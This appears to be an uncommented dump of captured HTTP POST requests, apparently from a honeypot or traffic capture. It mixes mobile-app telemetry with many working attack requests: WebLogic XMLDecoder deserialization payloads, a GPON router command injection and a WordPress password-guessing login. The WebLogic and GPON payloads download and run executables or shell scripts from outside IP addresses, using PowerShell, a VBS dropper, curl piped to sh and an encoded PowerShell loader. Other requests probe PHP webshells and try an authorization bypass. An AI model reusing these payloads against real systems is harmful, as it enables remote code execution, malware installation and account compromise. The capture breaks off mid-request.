Host: cm.adkmob.com
Connection: Keep-Alive
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
h=die('Hello, Peppa!');
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=141414
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ål÷yyÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìD!Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 364
Cache-Control: no-cache
QKRax97AbBRsWuOe4FWMVsBj6asWTPHjJrBDvDF9YkyywBo8OaEJmWsPlt5LLJPj80ewP14OIiiIfiWXf2YgptBCfOPHZYEBX3ZN75p42cDi6P1abw3UJV7IjrASirWc+FGuTaUJBD6d83cgVbvnImXJG22p+8fT7XeDHY4GD8vSuLwKyrOuaG89Wxwbkp/FK9CPsBLNxuYIoHsuQYUNHSbfmMwSvpi9yvh0t2n5BtaLqYsbVgTeOzc6WxX7hjFdvZZGJIf70HS298ofE0Gyc7J/2UpdRbbfG0tU/88bB8WdLy4p+iUaoMcL1w9bSYwYkGYOI057Gg9dwOLu05sh5tAhHbFc/gRPJtO2ss7xyw==
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å«™›^Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
m=die('Hello, Peppa!'.(string)(111111111*9))
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅΩÉû/Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î”˚Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /getcfg.php HTTP/1.1
Accept: */*
Cookie: uid=Zd5iHiPget
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 60
A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1019
Content-Type: multipart/form-data; boundary=54Wp6oWTng13p1jwpC8_PfFPP_wniO
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--54Wp6oWTng13p1jwpC8_PfFPP_wniO
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--54Wp6oWTng13p1jwpC8_PfFPP_wniO
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
233051
--54Wp6oWTng13p1jwpC8_PfFPP_wniO
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
f646a743e2b410e31b71046091a50c15
--54Wp6oWTng13p1jwpC8_PfFPP_wniO
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--54Wp6oWTng13p1jwpC8_PfFPP_wniO
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--54Wp6oWTng13p1jwpC8_PfFPP_wniO--
POST http://oc.umeng.com/v2/get_update_time HTTP/1.1
Content-Encoding: deflate
Content-Length: 64
Host: oc.umeng.com
Connection: Keep-Alive
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
xú´VJ,(»N≠T≤R254OµL2O35321H24µH10HL33S“Q*K-*ŒÃœãOŒOI™42T™ÁJ»
POST http://android.bugly.qq.com/rqd/async HTTP/1.1
wup_version: 3.0
cmd: 840
strategylastUpdateTime: 1490687517000
appVer: 18
prodId: e4696cbcd6
bundleId: com.differencetenderwhite.skirt
secureSessionId: 733247b121cb465c82e1f65970c22331_SZ
sdkVer: 2.2.2
platformId: 1
A37: HSPA%2B
A38: HSPA%2B
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: android.bugly.qq.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 1384
POST http://alog.umengcloud.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496056910822
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umengcloud.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2427
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å%ÑlhÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¯+Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache
log=admin&pwd=8888888
POST http://check.proxyradar.com/azenv.php?auth=149412004803&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å≈â$Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÿå(Y›∆√«∆fl
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
axa=die((string)(111111111*9));
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
axa=die('Hello, Peppa!'.(string)(111111111*9));
POST http://t5.proxy-checks.com/favicon.ico HTTP/1.1
Host: t5.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å`äQ<Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îêô1Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; EIE10;ENUSMSN; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache
VV6yySAXUpguJ+zZV/BQAnWqDHwY02tjJeQIfjCngnWVCA2HA8mzZo3cC8ScRa/PhUV/fSdLyoY3ste3HdFsuG8/NYkuuOKR7uzVbL5vJEuivWJr49WGxJl3FNvG+f30c4+cFPKLxhuPEg05ChBOrLIjGytaEGMPV/dvGoTOcWMzjm5sLVAxIcMGyOG/pEsXaXuPuyW9oqCEw6izljFgGZn5yiOhxaNnLu+Xw6tuCJeoPf2LPikq8XZak2geu+5IMDKgu4EsbQKLVfbxAmJ1CdXdBoX1mOIPz0WHQGwBnQdcKisOVXwCL9ldTRpN4ZIpLfHTz3eEbjN4RiSYA5clo+686doP6H/taONPgt+yU6IZZplF1vygIyvo1KWH/rQzjYPKEG9gcYB3LIwAJhxEcHPyjBiVyQlLV+rdQA==
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache
SqZakoucbZk/qI03Gh/BBpFpcCE/K1kG05hCz3kRLSmbGvcYaThYkcYQZFBAUBPiLbjJRadNEAkYjALnmda5647eI0cK6wQ9oRppxr0js9LljKShiILfFc36PTVOcuXKfu7ueUEiC6xedK/u8/IGF0rot7php5TA7At5VSrnsmwq9wchzV94hSg39fAAc9j+cf9YNCm20hg0R4UIGhALPxJru+hDftYPzy5wAzqADpvUapW1s++en3TKJu9xYzYvqUnRS8QFQQWqiRi6BGGTGi0wsdPEFh4QnO/aSrlQ+7YKiyNUW+UH1+u5qwaDb9umTLmXdL8yiQGakZf7yLH62aGVs3BNrJkJuBAXq/g0hwMQcxR0vxwWIvv1RD/pZc69hx0=
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 384
Cache-Control: no-cache
Q/BXlI/IYTLaeetXknzamZbIdRG/9IgNIkYtVQpPvjeqsWqytk8zHSCxuXixqbaNseZUvPAdoGuqp4mM8mD2H40pQQPC+4v+OlbsWQWNhITyZCQWL1Uo4pbDKGgaMyphtJrKxl7oonps8IjBjWJgsF//1u0bxwhZ5i4AUj8y25whRvZRE32ZXSd1IpJyU8J7EMItK1v25M4dXgIwrViavbUPStmPOFSy6TiSbKvcFyGP7GqjihlgGbtbWxQhvZ/0Nv1vwUpG1q11YoahiF9H0WdxjmWQNmgu6pkKyss6RiVXlzXtJtxLv/IRPxkHF2nBZ+UPJtNixbWsv4tuqyziZCesJbDh+rJqtmpt9BxvZeeVOFv/lR3753HmPIk78A==
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1063
Content-Type: multipart/form-data; boundary=9Hq9NdsEsV_V-Oq8ggfZjpKqx5Tz2RA79ZgSP
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--9Hq9NdsEsV_V-Oq8ggfZjpKqx5Tz2RA79ZgSP
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--9Hq9NdsEsV_V-Oq8ggfZjpKqx5Tz2RA79ZgSP
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
580119
--9Hq9NdsEsV_V-Oq8ggfZjpKqx5Tz2RA79ZgSP
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
449ed5404433a1c2338a2969c1a54207
--9Hq9NdsEsV_V-Oq8ggfZjpKqx5Tz2RA79ZgSP
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--9Hq9NdsEsV_V-Oq8ggfZjpKqx5Tz2RA79ZgSP
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--9Hq9NdsEsV_V-Oq8ggfZjpKqx5Tz2RA79ZgSP--
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://185.17.73.141:6666/ HTTP/1.0
Content-length: 24
Connection: close
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åa‰ÃÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞-Y›∆√«∆fl
POST http://analytics.seattleclouds.com/trackevent.ashx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: analytics.seattleclouds.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 230
screenSize=2&os=1&username=tculang&osVersion=4.4.4&appId=videolaguanak&param=&deviceModel=Xiaomi+MI+4LTE&connectionType=2&uniqueAppId=com.ramlidev.videolaguanak&publisherid=tashlik&type=2&screenDensity=480&deviceId=6ccc52a8048214f
POST http://p-behacdn.ksmobile.net/du HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: p-behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 126
~ª¥¸ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcék∆¶iRtc^9;∞êΩúqk?·È{<kZ&=:OdøúèïCiC*8kZ&=0OeBhGAhB*8kZ&=0OoAipaºóº’9j'ØóaKoBcp`B
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
POST http://check.proxyradar.com/azenv.php?auth=149596557049&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2547
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/System32/taskhostxz.exe&quot;&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/System32/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;cscript.exe C:/Windows/System32/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
